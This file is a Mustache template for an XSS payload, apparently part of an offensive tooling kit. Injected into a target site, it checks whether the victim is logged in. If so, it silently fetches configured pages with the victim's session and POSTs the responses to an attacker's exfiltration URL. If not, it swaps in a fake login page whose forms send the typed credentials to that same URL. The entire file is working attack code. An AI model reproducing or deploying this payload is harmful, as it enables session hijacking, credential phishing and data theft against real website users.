xss.stache

/*
 *  This outer function container ensures that we don't leak variables globally.
 */
(function() {
  var loginCheckURL = {{{loginCheckURL}}};
  var loginCheckPattern = /{{{loginCheckPattern}}}/i;
  var loginURL = {{{loginURL}}};
  var exfilURL = {{{exfilURL}}};

  /*
   *  We load in jQuery in a way which doesn't expose it to the surrounding page.
   *  This avoids issues with differing jQuery versions breaking target sites.
   */
  var script = document.createElement("script");
  script.src = 'https://code.jquery.com/jquery-3.2.1.min.js';
  script.type = 'text/javascript';
  script.onload = function() {
    (function($) {

      /*
       * As there are multiple ways to trigger our actions, set them up as functions.
       */
      function onLoggedIn() {
        /*
         *  The user is logged in - load the resources and send them to the exfil endpoint.
         *  This request will be launched when all resources load, or a 5s timeout elapses.
         */
        var isSent = false;
        var xdata = [];
        var remaining = {{dataURLCount}};
        var exfil = function() {
          if (!isSent) {
            var form = $('<form>');
            form.attr('method', 'POST');
            form.attr('action', exfilURL);
            for (var i = 0; i < xdata.length; i++) {
              for (var k in xdata[i]) {
                if (xdata[i].hasOwnProperty(k)) {
                  var tag = $('<input>');
                  tag.attr('name', k + i);
                  tag.val(xdata[i][k]);
                  form.append(tag);
                }
              }
            }
            $('body').append(form);
            form.submit();
          }
          isSent = true;
        }
        {{#dataURLs}}
        $.{{method}}({{{url}}}{{{#data}}}, function(r) {
          xdata.push({url: {{{url}}}, method: '{{{method}}}', response: r});
          remaining -= 1;
          if (remaining <= 0) { exfil(); }
        }, 'text');
        {{/dataURLs}}
        window.setTimeout(exfil, 5000);
      }

      function onNotLoggedIn() {
        /*
         *  The user is not logged in - fake load the login page then alter the forms.
         */
        if (window.history && window.history.replaceState) {
          window.history.replaceState({}, "Login", loginURL)
        } else if (window.history && window.history.pushState) {
          window.history.pushState({}, "Login", loginURL)
        }
        $.get(loginURL, function(r) {
          $('body').html(r);
          $('form').attr('action', exfilURL);
        }, 'text');
      }

      /*
       *  Fetch a page to check whether the user is logged in.
       */
      $.get(loginCheckURL, function(r) {
        if (r.match(loginCheckPattern)) {
          onLoggedIn();
        } else {
          onNotLoggedIn();
        }
      }, 'text').fail(onNotLoggedIn);
    })(window.jQuery.noConflict(true)) // noConflict(true) reverses changes to all globals
  };
  document.getElementsByTagName("head")[0].appendChild(script);
})();